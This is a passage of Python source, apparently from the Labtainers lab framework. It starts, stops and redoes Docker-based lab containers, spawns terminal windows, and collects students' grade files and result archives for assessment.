"""Check whether pid exists in the current process table.
UNIX only.
"""
if pid <= 0:
return False
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
elif err.errno == errno.EPERM:
# EPERM clearly means there's a process to deny access to
return True
else:
# According to "man 2 kill" possible error values are
# (EINVAL, EPERM, ESRCH)
raise
else:
return True
def ContainerTerminals(lab_path, start_config, container, terminal_count, terminal_groups, container_map):
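''' Spawn the configured xterm/gnome-terminal windows for a container and its clones (or queue
commands into terminal_groups); return the updated terminal count used for window placement. '''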
num_terminal = int(container.terminals)
clone_names = GetContainerCloneNames(container)
for mycontainer_name in clone_names:
logger.debug("container: %s Number of terminals: %d" % (mycontainer_name, num_terminal))
if mycontainer_name in container_map:
logger.debug('container %s mapped to %s' % (mycontainer_name, container_map[mycontainer_name]))
mycontainer_name = container_map[mycontainer_name]
CopyFilesToHost(lab_path, container.name, mycontainer_name, container.user)
''' HACK remove after a while.... catch case where framework updated to remove XTERM Instructions, but still using image
that includes instructions, which then consumes a window '''
if container.xterm is None:
cmd = "docker exec %s bash -c 'ls -l $HOME/instructions.txt'" % (mycontainer_name)
if DockerCmd(cmd, noloop=True):
logger.debug('Found instructions, force xterm')
container.xterm = 'instructions'
if container.xterm is not None:
logger.debug('container.xterm is <%s>' % container.xterm)
parts = container.xterm.split()
title = parts[0]
command = None
if title.lower() == 'instructions' and len(parts) == 1:
command = 'startup.sh'
elif len(parts) == 2:
command = parts[1]
else:
logger.error("Bad XTERM entryin in start.config: %s" % container.xterm)
exit(1)
if command is not None:
cmd = 'sh -c "cd /home/%s && .local/bin/%s"' % (container.user, command)
terminal_location, columns, lines = terminalCounter(terminal_count)
terminal_count += 1
# note hack to change --geometry to -geometry
spawn_command = "xterm %s -title %s -sb -rightbar -fa 'Monospace' -fs 11 -e docker exec -it %s %s & 2>/tmp/xterm.out" % (terminal_location[1:],
title, mycontainer_name, cmd)
logger.debug("xterm spawn: %s" % spawn_command)
xterm_pid = subprocess.Popen(shlex.split(spawn_command), stdout=subprocess.PIPE,stderr=subprocess.PIPE, close_fds=True).pid
# race condition, gnome may beat xterm to the startup.sh script
if command == 'startup.sh':
done = False
while pidExists(xterm_pid) and not done:
cmd = 'docker exec -it %s ls -l /tmp/.mylockdir' % mycontainer_name
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if 'No such file or directory' not in output[0].decode('utf-8'):
done = True
else:
time.sleep(0.2)
# If the number of terminals is -1 or zero -- do not spawn
#print('container terms %s is %d' % (mycontainer_name, num_terminal))
if not (num_terminal == 0 or num_terminal == -1):
for x in range(num_terminal):
#sys.stderr.write("%d \n" % terminal_count)
terminal_location, columns, lines = terminalCounter(terminal_count)
#sys.stderr.write("%s \n" % terminal_location)
#sys.stderr.write("%s \n" % mycontainer_name)
cmd = 'bash -l -c bash'
#spawn_command = "gnome-terminal %s -x docker exec -it %s bash -l &" % (terminal_location, mycontainer_name)
if container.terminal_group is not None:
if container.terminal_group not in terminal_groups:
terminal_count += 1
terminal_groups[container.terminal_group] = []
group_command = '"docker exec -it %s %s"' % (mycontainer_name, cmd)
terminal_groups[container.terminal_group].append(group_command)
else:
terminal_count += 1
spawn_command = 'gnome-terminal %s -- docker exec -it --env COLUMNS=%d --env LINES=%d %s %s &' % (terminal_location,
columns, lines, mycontainer_name, cmd)
logger.debug("gnome spawn: %s" % spawn_command)
#print spawn_command
os.system(spawn_command)
return terminal_count
def SkipContainer(run_container, name, start_config, servers):
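''' Return True if this container should not be started: a specific run_container was requested and
this is not it, or the servers filter ('server'/'client') excludes it. '''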
container = start_config.containers[name]
if run_container is not None and container.full_name != run_container:
return True
if servers is not None:
if servers == 'server':
if container.client == 'yes':
return True
elif servers == 'client':
if container.client != 'yes':
return True
return False
def readFirst(lab_path, labname, fname, quiet_start, bail_option=False):
#
# If fname exists in the lab's docs directory, display it (with LAB_MANUAL/LAB_DOCS substituted) before the student continues.
#
doc_dir = os.path.join(lab_path, 'docs')
read_first = os.path.join(doc_dir, fname)
pdf = '%s.pdf' % labname
manual = os.path.join(doc_dir, pdf)
if os.path.isfile(read_first):
print('\n\n')
command = 'cat %s' % read_first
less = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
sed_cmd = "sed -e s+LAB_MANUAL+%s+ -e s+LAB_DOCS+%s+" % (manual, doc_dir)
sed = subprocess.Popen(sed_cmd.split(), stdin=less.stdout, stdout=subprocess.PIPE)
output = sed.communicate()[0].decode('utf-8')
print(output)
if not quiet_start:
less.wait()
if not bail_option:
if sys.version_info >=(3,0):
dumb = input("Press <enter> to start the lab\n")
else:
dumb = raw_input("Press <enter> to start the lab\n")
else:
if sys.version_info >=(3,0):
dumb = input("Continue? (y/n)")
else:
dumb = raw_input("Continue? (y/n)")
if dumb.lower() != 'y':
cmd = 'rm -fr .tmp/%s' % labname
os.system(cmd)
print('Exiting lab')
exit(0)
def DoTerminals(start_config, lab_path, run_container=None, servers=None, container_map={}):
# spawn terminal for each container based on num_terminal
terminal_count = 0
terminal_groups = {}
for name, container in start_config.containers.items():
# Do not spawn terminal if it is regression testing
if SkipContainer(run_container, name, start_config, servers):
print('Skipping container %s' % name)
continue
terminal_count = ContainerTerminals(lab_path, start_config, container, terminal_count, terminal_groups, container_map)
for tg in terminal_groups:
tab_commands = ''
tab = '--window'
for command in terminal_groups[tg]:
tab_commands = tab_commands+' %s -e %s' % (tab, command)
tab = '--tab'
#tab_commands = tab_commands+' --tab %s --' % command
terminal_location, columns, lines = terminalCounter(terminal_count)
terminal_count += 1
spawn_command = 'gnome-terminal %s %s' % (terminal_location, tab_commands)
FNULL = open(os.devnull, 'w')
result = subprocess.Popen(shlex.split(spawn_command), close_fds=True, stdout=FNULL, stderr=subprocess.STDOUT)
logger.debug("gnome spawn tg: %s" % spawn_command)
#os.system(spawn_command)
def GetWaitTapDir():
user = os.getenv('USER')
wait_tap_dir = os.path.join('/tmp', user, 'wait_tap_dir')
return wait_tap_dir
def DoStart(start_config, labtainer_config, lab_path,
quiet_start, run_container, servers, clone_count, auto_grade=False, debug_grade=False, container_images=None):
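''' Start all containers for the lab: run any host system check, create subnets, gather the student
e-mail, start each container in its own thread, then show read_first.txt and spawn terminals.
Returns 0 on success; exits on failure. '''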
labname = os.path.basename(lab_path)
logger.debug("DoStart Multiple Containers and/or multi-home networking")
''' make sure root can access Xserver '''
SetXhost()
apps2start = []
has_multi_container = CheckLabContainerApps(start_config, lab_path, apps2start)
logger.debug("Apps to start is (%s)" % apps2start)
hostSystem_script = os.path.join(lab_path, '*/_bin', 'hostSystemCheck.py')
hostSystemCheckList = glob.glob('%s' % hostSystem_script)
logger.debug("List of hostSystemCheck.py (%s)" % hostSystemCheckList)
# If more than one hostSystemCheck.py - pick first one
if hostSystemCheckList != [] and os.path.isfile(hostSystemCheckList[0]):
# Do Host System Check if necessary (if file exists)
command = "%s" % hostSystemCheckList[0]
result = subprocess.call(shlex.split(command), stderr=subprocess.PIPE)
if result == FAILURE:
logger.warning("Host System Check indicates error encountered")
if sys.version_info >=(3,0):
user_input=input("Would you like to quit? (yes/no)\n")
else:
user_input=raw_input("Would you like to quit? (yes/no)\n")
user_input=user_input.strip().lower()
#print "user_input (%s)" % user_input
if user_input == "yes":
sys.exit(1)
# Create SUBNETS
if CreateSubnets(start_config):
''' don't create tapped containers until tap is ready '''
tap_lock_dir = GetWaitTapDir()
lock = os.path.join(tap_lock_dir, 'lock')
try:
os.rmdir(lock)
except:
pass
try:
os.makedirs(tap_lock_dir)
except:
pass
student_email = None
threads = []
results = []
if has_multi_container:
container_warning_printed = False
start_config, student_email = CheckEmailReloadStartConfig(start_config, quiet_start, lab_path,
labtainer_config, logger, servers, clone_count)
for name, container in start_config.containers.items():
if SkipContainer(run_container, name, start_config, servers):
#print('gonna skip %s' % run_container)
continue
if has_multi_container and container_warning_printed == False:
print("Starting the lab, this may take a moment...")
container_warning_printed = True
image_info = None
if container_images is not None:
logger.debug('container images not none,get for %s' % name)
image_info = container_images[name]
logger.debug('container images got image_info %s' % image_info)
if image_info is None:
print('is none, map is %s' % str(container_images))
t = threading.Thread(target=DoStartOne, args=(labname, name, container, start_config, labtainer_config, lab_path,
student_email, quiet_start, results, auto_grade, image_info))
threads.append(t)
t.setName(name)
t.start()
logger.debug('started all')
for t in threads:
t.join()
logger.debug('joined %s' % t.getName())
if False in results:
DoStop(start_config, labtainer_config, lab_path, False, run_container, servers)
logger.error('DoStartOne has at least one failure!')
sys.exit(1)
readFirst(lab_path, labname, 'read_first.txt', quiet_start)
DoTerminals(start_config, lab_path, run_container=run_container, servers=servers)
if apps2start != [] and not auto_grade:
print("Please wait for the apps (%s) to launch" % apps2start)
syncdir = os.path.join(os.getenv('LABTAINER_DIR'), 'scripts','labtainer-student', '.tmp', labname, 'sync')
logger.debug('syncdir %s' % syncdir)
try:
os.mkdir(syncdir)
except:
pass
logger.debug('Labtainer lab %s started and ready' % labname)
return 0
def terminalCounter(terminal_count):
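''' Return (--geometry string, columns, lines), offset by the terminal count so successive windows cascade. '''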
columns = 100
lines = 25
x_coordinate = columns + ( 50 * terminal_count )
y_coordinate = 75 + ( 50 * terminal_count)
terminal_location = "--geometry %dx%d+%d+%d" % (columns, lines, x_coordinate, y_coordinate)
return terminal_location, columns, lines
def terminalWideCounter(terminal_count):
x_coordinate = 100 + ( 50 * terminal_count )
y_coordinate = 75 + ( 50 * terminal_count)
terminal_location = "--geometry 160x35+%d+%d" % (x_coordinate, y_coordinate)
return terminal_location
# Check existence of /home/$USER/$HOST_HOME_XFER directory - create if necessary
def CreateHostHomeXfer(host_xfer_dir):
# remove trailing '/'
host_xfer_dir = host_xfer_dir.rstrip('/')
logger.debug("host_home_xfer directory (%s)" % host_xfer_dir)
if os.path.exists(host_xfer_dir):
# exists but is not a directory
if not os.path.isdir(host_xfer_dir):
# remove file then create directory
os.remove(host_xfer_dir)
os.makedirs(host_xfer_dir)
#else:
# logger.debug("host_home_xfer directory (%s) exists" % host_xfer_dir)
else:
# does not exist, create directory
os.makedirs(host_xfer_dir)
# CopyChownGradesFile
def CopyChownGradesFile(start_config, labtainer_config, name, container_name, container_user, ignore_stop_error):
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, start_config.labname)
labname = start_config.labname
username = getpass.getuser()
# Copy <labname>.grades.txt file
grade_filename = '/home/%s/%s.grades.txt' % (container_user, labname)
command = "docker cp %s:%s /home/%s/%s" % (container_name, grade_filename, username, host_home_xfer)
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(shlex.split(command))
logger.debug("Result of subprocess.Popen exec cp %s.grades.txt file is %s" % (labname, result))
if result == FAILURE:
# try grabbing instructor.log
command = "docker cp %s:/tmp/instructor.log /tmp/instructor.log" % (container_name)
result = subprocess.call(shlex.split(command))
logger.debug("Result of subprocess.Popen exec cp instructor.log file is %s" % (result))
clone_names = GetContainerCloneNames(start_config.containers[name])
for clone_full in clone_names:
StopMyContainer(clone_full, ignore_stop_error)
if ignore_stop_error:
logger.debug("Container %s fail on executing cp %s.grades.txt file!\n" % (container_name, labname))
else:
logger.warning("Container %s fail on executing cp %s.grades.txt file!\n" % (container_name, labname))
return
# Copy <labname>.grades.json file
gradejson_filename = '/home/%s/%s.grades.json' % (container_user, labname)
command = "docker cp %s:%s /home/%s/%s" % (container_name, gradejson_filename, username, host_home_xfer)
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(shlex.split(command))
logger.debug("Result of subprocess.Popen exec cp %s.grades.json file is %s" % (labname, result))
if result == FAILURE:
clone_names = GetContainerCloneNames(start_config.containers[name])
for clone_full in clone_names:
StopMyContainer(clone_full, ignore_stop_error)
if ignore_stop_error:
logger.debug("Container %s fail on executing cp %s.grades.json file!\n" % (container_name, labname))
else:
logger.warning("Container %s fail on executing cp %s.grades.json file!\n" % (container_name, labname))
return
def StartLab(lab_path, force_build=False, is_redo=False, quiet_start=False,
run_container=None, servers=None, clone_count=None, auto_grade=False, debug_grade=False):
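''' Start the named lab: validate it, show read_pre.txt on first start, parse configs, remove cached
start.config and old containers on redo, resolve/pull images (checking the framework version),
create the host transfer directory and call DoStart. '''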
labname = os.path.basename(lab_path)
mycwd = os.getcwd()
myhomedir = os.environ['HOME']
logger.debug("current working directory for %s" % mycwd)
logger.debug("current user's home directory for %s" % myhomedir)
logger.debug("ParseStartConfig for %s" % labname)
isValidLab(lab_path)
lab_count = LabCount.addCount('./', labname, is_redo, logger)
if lab_count == 1:
readFirst(lab_path, labname, 'read_pre.txt', quiet_start, bail_option=True)
labtainer_config, start_config = GetBothConfigs(lab_path, logger, servers, clone_count)
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, labname)
LABS_DIR = os.path.abspath('../../labs')
didfix = False
''' hackey assumption about running from labtainers-student or labtainers-instructor '''
container_bin = './bin'
if is_redo or force_build:
my_start_config = os.path.join('./.tmp',labname, 'start.config')
if os.path.isfile(my_start_config):
logger.debug('Cached start.config removed %s' % my_start_config)
os.remove(my_start_config)
x11 = False
container_images = {}
for name, container in start_config.containers.items():
if SkipContainer(run_container, name, start_config, servers):
#print('skipping name %s %s' % (name, start_config.containers[name]))
continue
mycontainer_name = container.full_name
mycontainer_image_name = container.image_name
if container.x11.lower() == 'yes':
x11 = True
if is_redo:
# If it is a redo then always remove any previous container
# If it is not a redo, i.e., start.py then DO NOT remove existing container
clone_names = GetContainerCloneNames(container)
for clone_full in clone_names:
cmd = 'docker rm %s' % clone_full
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
logger.debug("Command was (%s)" % cmd)
if len(output[1]) > 0:
logger.debug("Error from command = '%s'" % str(output[1].decode('utf-8')))
#image_exists, result, dumb = ImageExists(mycontainer_image_name, container.registry)
if container.registry == labtainer_config.test_registry:
branch, container_registry = registry.getBranchRegistry()
base_registry = container_registry
else:
container_registry = container.registry
base_registry = container.base_registry
image_info = imageInfo(mycontainer_image_name, container_registry, base_registry, labtainer_config, quiet=quiet_start)
container_images[name] = image_info
if image_info is not None:
logger.debug('Image version %s framework_version %s' % (image_info.version, framework_version))
if image_info.version is not None and int(image_info.version) > framework_version:
print('**** Labtainer update required *****')
print('This lab requires that you update your labtainers installation.')
print('Please type: update-labtainer.sh')
print('and then try starting the lab again.')
exit(0)
if not image_info.local:
dockerPull(container_registry, mycontainer_image_name)
else:
logger.error('Could not find image info for %s' % name)
exit(1)
# Check existence of /home/$USER/$HOST_HOME_XFER directory - create if necessary
host_xfer_dir = '%s/%s' % (myhomedir, host_home_xfer)
CreateHostHomeXfer(host_xfer_dir)
if x11:
sockets = os.listdir('/tmp/.X11-unix')
if len(sockets) == 0:
print('Cannot create X11 windows, the socket is missing. Try rebooting your VM')
logger.debug('Cannot create X11 windows, the socket is missing. Try rebooting your VM')
exit(1)
DoStart(start_config, labtainer_config, lab_path, quiet_start,
run_container, servers=servers, clone_count=clone_count, auto_grade=auto_grade,
debug_grade=debug_grade, container_images=container_images)
def dumb():
pass
'''
'''
def RedoLab(lab_path, force_build=False, is_redo=False, quiet_start=False,
run_container=None, servers=None, clone_count=None, auto_grade=False, debug_grade=False):
mycwd = os.getcwd()
myhomedir = os.environ['HOME']
# Pass 'True' to ignore_stop_error (i.e., ignore certain error encountered during StopLab
# since it might not even be an error)
lab_list, dumb = GetListRunningLabType()
if len(lab_list) > 0:
StopLab(lab_path, True)
is_redo = True
StartLab(lab_path, force_build, is_redo=is_redo, quiet_start=quiet_start,
run_container=run_container, servers=servers, clone_count=clone_count, auto_grade=auto_grade, debug_grade=debug_grade)
def CheckShutdown(lab_path, name, container_name, container_user, ignore_stop_error):
''' NOT USED at the moment '''
done = False
count = 0
while not done:
command='docker cp %s:/tmp/.shutdown_done /tmp/' % (container_name)
logger.debug(command)
child = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
error = child.stderr.read().decode('utf-8').strip()
if len(error) > 0:
logger.debug("response from docker cp %s" % error)
time.sleep(1)
else:
logger.debug("must have found the shutdown_done file")
done = True
count += 1
if count > 5:
done = True
def PreStop(container_name, ts):
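''' If the container provides a ~/.local/bin/prestop script, run it with a 20 second timeout and
capture its output under ~/.local/result. '''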
logger.debug("About to call prestop")
cmd_path = '$HOME/.local/bin/prestop'
cmd = "docker exec %s bash -c 'ls -l %s'" % (container_name, cmd_path)
if DockerCmd(cmd, noloop=True):
cmd = "docker exec %s bash -c 'timeout -s SIGTERM 20s %s >$HOME/.local/result/prestop.stdout.%s 2>&1'" % (container_name, cmd_path, ts)
DockerCmd(cmd, noloop=True)
def GatherOtherArtifacts(lab_path, name, container_name, container_user, container_password, ignore_stop_error):
'''
Parse the results.config file looking for files named by absolute paths,
and copy those into the .local/result directory, maintaining the original
directory structure, e.g., .local/result/var/log/foo.log
'''
config_path = os.path.join(lab_path,"instr_config")
results_config_path = os.path.join(config_path,"results.config")
did_file = []
CopyAbsToResult(container_name, '/root/.bash_history', container_user, ignore_stop_error)
did_file.append('/root/.bash_history')
with open (results_config_path) as fh:
for line in fh:
''' container:filename is between "=" and first " : " '''
line = line.strip()
if line.startswith('#') or len(line) == 0:
continue
if '=' not in line:
logger.warning('no = in line %s' % line)
continue
after_equals = line.split('=', 1)[1].strip()
# note assumes field delimiters are space-:-space, vice container:file
fname = after_equals.split(' : ')[0].strip()
is_mine = False
if ':' in fname:
'''
[container_name:]<prog>.[stdin | stdout] | [container_name:]file_path[:time_program]
'''
f_container = None
parts = fname.split(':')
if len(parts) == 2:
if parts[0].startswith('/'):
filename = parts[0]
else:
f_container = parts[0]
filename = parts[1]
elif len(parts) == 3:
f_container = parts[0]
filename = parts[1]
if f_container is not None and f_container.strip() == name:
is_mine = True
filename = filename.strip()
else:
is_mine = True
filename = fname
if is_mine:
if filename.startswith('/') and filename not in did_file:
''' copy from abs path to ~/.local/result '''
logger.debug('file on this container to copy <%s>' % filename )
CopyAbsToResult(container_name, filename, container_user, ignore_stop_error)
did_file.append(filename)
def CopyAbsToResult(container_name, fname, container_user, ignore_stop_error):
''' copy from abs path to ~/.local/result '''
command='docker exec %s mkdir -p /home/%s/.local/result' % (container_name, container_user)
logger.debug(command)
subprocess.call(shlex.split(command), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
command='docker exec %s sudo cp --parents %s /home/%s/.local/result' % (container_name, fname, container_user)
logger.debug(command)
child = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
error = child.stderr.read().decode('utf-8').strip()
if len(error) > 0:
if ignore_stop_error:
logger.debug('error from docker: %s' % error)
logger.debug('command was %s' % command)
else:
logger.error('error from docker: %s' % error)
logger.error('command was %s' % command)
#command='docker exec %s echo "%s\n" | sudo -S chmod a+r -R /home/%s/.local/result' % (container_name, container_password, container_user)
command='docker exec %s sudo chmod a+r -R /home/%s/.local/result' % (container_name, container_user)
child = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
error = child.stderr.read().decode('utf-8').strip()
if len(error) > 0:
if ignore_stop_error:
logger.debug('chmod ERROR: %s' % error)
logger.debug('command was %s' % command)
else:
logger.error('chmod ERROR: %s' % error)
logger.error('command was %s' % command)
def CreateCopyChownZip(start_config, labtainer_config, name, container_name, container_image, container_user,
container_password, ignore_stop_error, keep_running, running_container=None):
'''
Zip up the student home directory and copy it to the Linux host home directory
'''
logger.debug('in CreateCopyChownZip')
if running_container is None:
running_container = container_name
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, start_config.labname)
# Run 'Student.py' - This will create zip file of the result
logger.debug("About to call Student.py")
''' Copy the Student.py on each stop to handle cases where the parameter list changes.'''
cmd = 'docker cp lab_bin/Student.py %s:/home/%s/.local/bin/' % (running_container, container_user)
if not DockerCmd(cmd):
logger.error('failed to copy Student.py')
cmd_path = '/home/%s/.local/bin/Student.py' % (container_user)
#command=['docker', 'exec', '-i', container_name, 'echo "%s\n" |' % container_password, '/usr/bin/sudo', cmd_path, container_user, container_image]
command=['docker', 'exec', '-i', running_container, '/usr/bin/sudo', cmd_path, container_user, container_image, str(keep_running)]
logger.debug('cmd: %s' % str(command))
child = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = child.communicate()
''' TBD remaining problems with flushing stdout? '''
#if keep_running and len(output[0].strip()) > 0:
# print('\n<<<<< You may need to stop: %s in order to obtain a complete assessment. >>>>>\n' % output[0].decode('utf-8').strip())
if len(output[1].strip()) > 0:
if ignore_stop_error:
logger.debug("Container %s fail on executing Student.py %s \n" % (running_container, output[1].decode('utf-8')))
else:
logger.error("Container %s fail on executing Student.py %s \n" % (running_container, output[1].decode('utf-8')))
return None, None
logger.debug("results from Student.py: %s" % output[0].decode('utf-8'))
#out_string = output[0].strip()
#if len(out_string) > 0:
# logger.debug('output of Student.py is %s' % out_string)
username = getpass.getuser()
tmp_dir=os.path.join('/tmp/labtainers', container_name)
shutil.rmtree(tmp_dir, ignore_errors=True)
try:
os.makedirs(tmp_dir)
except os.error:
logger.error("did not expect to find dir %s" % tmp_dir)
source_dir = os.path.join('/home', container_user, '.local', 'zip')
cont_source = '%s:%s' % (container_name, source_dir)
logger.debug('will copy from %s ' % source_dir)
command = ['docker', 'cp', cont_source, tmp_dir]
# The zip filename created by Student.py has the format of e-mail.labname.zip
logger.debug("Command to execute is (%s)" % command)
child = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
error_string = child.stderr.read().decode('utf-8').strip()
if len(error_string) > 0:
if ignore_stop_error:
logger.debug("Container %s fail on executing cp zip file: %s\n" % (container_name, error_string))
logger.debug("Command was (%s)" % command)
else:
logger.error("Container %s fail on executing cp zip file: %s\n" % (container_name, error_string))
logger.error("Command was (%s)" % command)
clone_names = GetContainerCloneNames(start_config.containers[name])
for clone_full in clone_names:
StopMyContainer(clone_full, ignore_stop_error)
return None, None
local_tmp_zip = os.path.join(tmp_dir, 'zip')
try:
orig_zipfilenameext = os.listdir(local_tmp_zip)[0]
except:
if ignore_stop_error:
logger.debug('no files at %s\n' % local_tmp_zip)
else:
logger.error('no files at %s\n' % local_tmp_zip)
return None, None
orig_zipfilename, orig_zipext = os.path.splitext(orig_zipfilenameext)
baseZipFilename = os.path.basename(orig_zipfilename)
#NOTE: Use the '=' to separate e-mail+labname from the container_name
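    # Hypothetical example: 'bob@sample.edu.telnetlab' + '=' + 'telnetlab.server.student' + '.zip'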
DestZipFilename = '%s=%s.zip' % (baseZipFilename, container_name)
DestZipPath = os.path.join('/home', username, host_home_xfer, DestZipFilename)
shutil.copyfile(os.path.join(local_tmp_zip, orig_zipfilenameext), DestZipPath)
currentContainerZipFilename = "/home/%s/%s/%s" % (username, host_home_xfer, DestZipFilename)
return baseZipFilename, currentContainerZipFilename
# Stop my_container_name container
def StopMyContainer(container_name, ignore_stop_error):
command = "docker stop -t 1 %s" % container_name
logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
if ignore_stop_error:
logger.debug('Fail to stop container, error returned %s' % output[1].decode('utf-8'))
else:
logger.error('Fail to stop container, error returned %s' % output[1].decode('utf-8'))
#if len(output[0].strip()) > 0:
# logger.debug('StopMyContainer stdout %s' % output[0])
#result = subprocess.call(command, shell=True)
def GetContainerID(image):
command = "docker ps"
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
retval = None
if len(output[1].strip()) > 0:
logger.error('Fail to get a list of running containers, error returned %s' % output[1].decode('utf-8'))
elif len(output[0].decode('utf-8')) > 0:
docker_ps_output = output[0].decode('utf-8').split('\n')
for line in docker_ps_output:
line = line.strip()
if image in line:
parts = line.split()
retval = parts[0]
break
return retval
# Get a list of running lab names
def GetListRunningLabType():
lablist = []
is_gns3 = False
# Note: doing "docker ps" not "docker ps -a" to get just the running container
command = "docker ps"
logger.debug("GetListRunningLab Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('Fail to get a list of running containers, error returned %s' % output[1].decode('utf-8'))
sys.exit(1)
if len(output[0].decode('utf-8')) > 0:
docker_ps_output = output[0].decode('utf-8').split('\n')
for each_line in docker_ps_output:
# Skip empty line or the "CONTAINER ID" line - the header line returned by "docker ps"
current_line = each_line.strip()
if not current_line or len(current_line) == 0 or current_line.startswith("CONTAINER"):
continue
logger.debug(current_line)
# Assume the container name is the last token on the line
container_info = current_line.split()
container_name = container_info[-1]
# And the image is the 2nd token
image_name = container_info[1]
image_name = os.path.basename(image_name)
if image_name == 'labtainer.master.headless' or image_name == 'labtainer.headless.tester':
continue
if container_name.startswith(image_name):
                ''' std Labtainers image, get its labname '''
labname = container_name.split('.')[0]
elif 'labtainer' in image_name:
''' gns3 labtainer image '''
labname = image_name.split('_', 1)[0]
is_gns3 = True
else:
logger.debug('not a labtainer: %s' % image_name)
continue
if labname not in lablist:
logger.debug('appending %s' % labname)
lablist.append(labname)
return lablist, is_gns3
def GetListRunningLab():
lab_list, is_gns3 = GetListRunningLabType()
return lab_list
# Given a valid network name, get the list of lab names for the containers using that network.
# Note: the network name is passed in as an argument
def GetListLabContainerOnNetwork(network_name):
containerlabnamelist = []
command = "docker network inspect %s" % network_name
logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('Fail to inspect the network %s, error returned %s' % (network_name, output[1].decode('utf-8')))
sys.exit(1)
if len(output[0]) > 0:
network_result = json.loads(output[0].decode('utf-8'))
if len(network_result) != 0:
result = network_result[0]
containers = result["Containers"]
for key in containers:
container_name = containers[key]["Name"]
# Assume the labname is the first token if split by '.'
labname = container_name.split('.')[0]
if labname not in containerlabnamelist:
containerlabnamelist.append(labname)
return containerlabnamelist
# Given an IP address (gateway IP address) - find a network name that has that IP address as its gateway
# Note: the IP address is passed in as an argument
def FindNetworkGivenGatewayIP(gateway_address):
found_match_network = False
found_match_network_name = ""
logger.debug("FindNetworkGivenGatewayIP %s" % gateway_address)
networklist = []
# First get a list of network name of driver=bridge
command = "docker network ls --filter driver=bridge"
logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('Fail to get a list of network (driver=bridge), error returned %s' % output[1].decode('utf-8'))
sys.exit(1)
if len(output[0]) > 0:
network_list = output[0].decode('utf-8').split('\n')
for each_line in network_list:
# Skip empty line or the "NETWORK ID" line - the header line returned by "docker network"
current_line = each_line.strip()
if not current_line or current_line.startswith("NETWORK"):
continue
# Assume the network name is the second token on the line
container_info = current_line.split()
network_name = container_info[1]
# Do not need to check network name "bridge"
if network_name != "bridge" and network_name not in networklist:
networklist.append(network_name)
# Loop through each network (driver=bridge) to find if any uses IP address as gateway
for network_name in networklist:
command = "docker network inspect %s" % network_name
logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('Fail to inspect the network %s, error returned %s' % (network_name, output[1].decode('utf-8')))
sys.exit(1)
if len(output[0]) > 0:
network_result = json.loads(output[0].decode('utf-8'))
if len(network_result) != 0:
result = network_result[0]
ipam_config = result["IPAM"]["Config"][0]
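                # Each IPAM Config entry is typically a dict like
                # {'Subnet': '172.20.0.0/16', 'Gateway': '172.20.0.1'} (values illustrative)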
for key in ipam_config:
if key == "Gateway":
ipam_config_gateway_ip = ipam_config[key]
if gateway_address == ipam_config_gateway_ip:
found_match_network = True
found_match_network_name = network_name
break
return found_match_network, found_match_network_name
# Given a subnet (network subnet) - find a network name that has that same subnet
# Note: the subnet is passed in as an argument
def FindNetworkGivenSubnet(subnet):
found_match_network = False
found_match_network_name = ""
logger.debug("FindNetworkGivenSubnet %s" % subnet)
networklist = []
# First get a list of network name of driver=bridge
command = "docker network ls --filter driver=bridge"
logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('Fail to get a list of network (driver=bridge), error returned %s' % output[1].decode('utf-8'))
sys.exit(1)
if len(output[0]) > 0:
network_list = output[0].decode('utf-8').split('\n')
for each_line in network_list:
# Skip empty line or the "NETWORK ID" line - the header line returned by "docker network"
current_line = each_line.strip()
if not current_line or current_line.startswith("NETWORK"):
continue
# Assume the network name is the second token on the line
container_info = current_line.split()
network_name = container_info[1]
# Do not need to check network name "bridge"
if network_name != "bridge" and network_name not in networklist:
networklist.append(network_name)
# Loop through each network (driver=bridge) to find if any that has the same subnet
for network_name in networklist:
command = "docker network inspect %s" % network_name
logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].decode('utf-8').strip()) > 0:
logger.error('Fail to inspect the network %s, error returned %s' % (network_name, output[1].decode('utf-8')))
sys.exit(1)
if len(output[0]) > 0:
network_result = json.loads(output[0].decode('utf-8'))
if len(network_result) != 0:
result = network_result[0]
ipam_config = result["IPAM"]["Config"][0]
for key in ipam_config:
if key == "Subnet":
ipam_config_subnet = ipam_config[key]
if subnet == ipam_config_subnet:
found_match_network = True
found_match_network_name = network_name
break
